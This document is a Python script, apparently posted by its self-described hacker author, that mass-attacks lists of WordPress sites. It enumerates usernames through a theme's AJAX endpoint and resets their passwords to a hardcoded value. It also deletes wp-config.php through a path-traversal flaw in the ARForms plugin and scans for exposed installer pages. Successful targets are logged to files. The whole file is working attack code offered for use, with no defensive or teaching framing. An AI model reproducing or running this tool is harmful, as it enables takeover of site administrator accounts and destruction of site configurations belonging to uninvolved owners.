po

1. import requests, urllib, re, sys, json, os
2. from multiprocessing.dummy import Pool as ThreadPool
3. from time import time as timer
4. from platform import system
5. from colorama import Fore
6. from colorama import Style
7. from pprint import pprint
8. from colorama import init
9. init(autoreset=True)
10. ####### Colors ######
11. fr = Fore.RED
12. fc = Fore.CYAN
13. fw = Fore.WHITE
14. fg = Fore.GREEN
15. sd = Style.DIM
16. sn = Style.NORMAL
17. sb = Style.BRIGHT
18. #######################
19. # Coded By RxR HaCkEr #
20. #######################
21. try:
22. with open(sys.argv[1], 'r') as f:
23. woh = f.read().splitlines()
24. except IOError:
25. pass
26. woh = list((woh))
27.  
28.  
29. headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
30. "Accept": "*/*",
31. "Accept-Language": "en-US,en;q=0.5",
32. "Accept-Encoding": "gzip, deflate",
33. "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
34. "X-Requested-With": "XMLHttpRequest",
35. "Connection": "close"}
36.  
37.  
38. def Banners():
39.  
40. if system() == 'Linux':
41. os.system('clear')
42. if system() == 'Windows':
43. os.system('cls')
44.  
45. banner = """{}{} \n \n
46.  
47. ______ ______ _ _ _____ _ _____
48. | ___ \ | ___ \ | | | | / __ \| | | ___|
49. | |_/ /__ __| |_/ / | |_| | __ _ | / \/| | __| |__ _ __
50. | / \ \/ /| / | _ | / _` || | | |/ /| __|| '__|
51. | |\ \ > < | |\ \ | | | || (_| || \__/\| < | |___| |
52. \_| \_|/_/\_\\_| \_| \_| |_/ \__,_| \____/|_|\_\\____/|_|
53.  
54. Coded By RxR HaCkEr
55. Skype:a.789a
56.  
57.  
58.  
59. # reset pwd , del confing , install wp
60. # SimpLe TooLs :D
61. \n""".format(fc, sb)
62.  
63. print banner
64.  
65. def Domains(url):
66.  
67. if '://' not in url:
68. return "http://" + url
69. else:
70. return url
71.  
72.  
73.  
74. def enum(url):
75.  
76. try:
77.  
78. for i in range(5):
79. enum = urllib.urlencode({'cs_uid': i, 'action': 'cs_employer_ajax_profile'})
80. data = requests.post(url + "/wp-admin/admin-ajax.php", data=enum, headers=headers, verify=False)
81. login = re.findall(r'name="display_name" value=\"(.*?)\"',str(data.content))
82. for user in login:
83. return user
84.  
85. except Exception as Exx:
86. print(Exx)
87.  
88.  
89. def wp_reset(site):
90.  
91. try:
92.  
93. url = Domains(site)
94.  
95. login = enum(url)
96.  
97. pw = "rxrhack1337"
98.  
99. reset = urllib.urlencode({'new_pass': pw, 'confirm_new_pass': pw, 'user_login': login, 'action': 'cs_reset_pass'})
100. data = requests.post(url + "/wp-admin/admin-ajax.php", data=reset, headers=headers, verify=False)
101.  
102. res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
103. for i in res:
104. if i == str('icon-checkmark6') and data.status_code == 200:
105. print("Target :{} username :{} password :{} {}{}successfully reset ! =)").format(url,login,pw,sb,fg)
106. open('reset_success.txt', 'a').write(url + "|" + login + "|" + pw + "\n")
107. else:
108. print('\nTarget :{} {}{}Error ! Cannot reset password.').format(url,sb,fr)
109.  
110.  
111.  
112. except Exception as Ex:
113. print(Ex)
114.  
115.  
116. def Arforms_config(site):
117.  
118. try:
119.  
120. url = Domains(site)
121.  
122. payload = {
123. "action":"arf_delete_file",
124. "file_name":"../../../../wp-config.php"
125. }
126.  
127. r = requests.post(url + "/wp-admin/admin-ajax.php", data=payload, headers=headers)
128.  
129. sh = requests.get(url + "/wp-admin")
130.  
131. if 'id="setup" method="post" action="?step=0' in sh.content:
132. print("Target : {} {}{}Vulnerability :D").format(url,sb,fg)
133. open('arforms_del.txt', 'a').write(url + "\n")
134. else:
135. print("Target : {} {}{}Not Vulnerability ").format(url,sb,fr)
136.  
137. except:
138. pass
139.  
140.  
141. def wp_install(site):
142.  
143. try:
144. url = Domains(site)
145.  
146. list_path = ['/','/new', '/wp', '/wordpress']
147.  
148. for path in list_path:
149. check = requests.get(url + path + "/wp-admin/setup-config.php" ,headers=headers)
150. if '<a href="setup-config.php?step=1' in check.content:
151. print("Target : {} {}{}Vulnerability ").format(url,sb,fg)
152. open('wp_install.txt', 'a').write(url + path + "/wp-admin/setup-config.php" + "\n")
153. else:
154. print("Target : {} {}{}Not Vulnerability ").format(url,sb,fr)
155.  
156. except:
157. pass
158.  
159. def Run_Work(site):
160.  
161. try:
162.  
163. url = Domains(site)
164.  
165. # bug for reset the user of the admin :D
166. wp_reset(url)
167.  
168. # bug for del the config then u can re install it :D
169.  
170. Arforms_config(url)
171.  
172. # check installer wp
173. wp_install(url)
174.  
175. except:
176. pass
177.  
178.  
179. Banners()
180. def Main():
181.  
182. try:
183. start = timer()
184. pp = ThreadPool(40)
185. pr = pp.map(Run_Work, woh)
186. print('Time: ' + str(timer() - start) + ' seconds')
187. except:
188. pass
189.  
190.  
191. if __name__ == '__main__':
192. Main()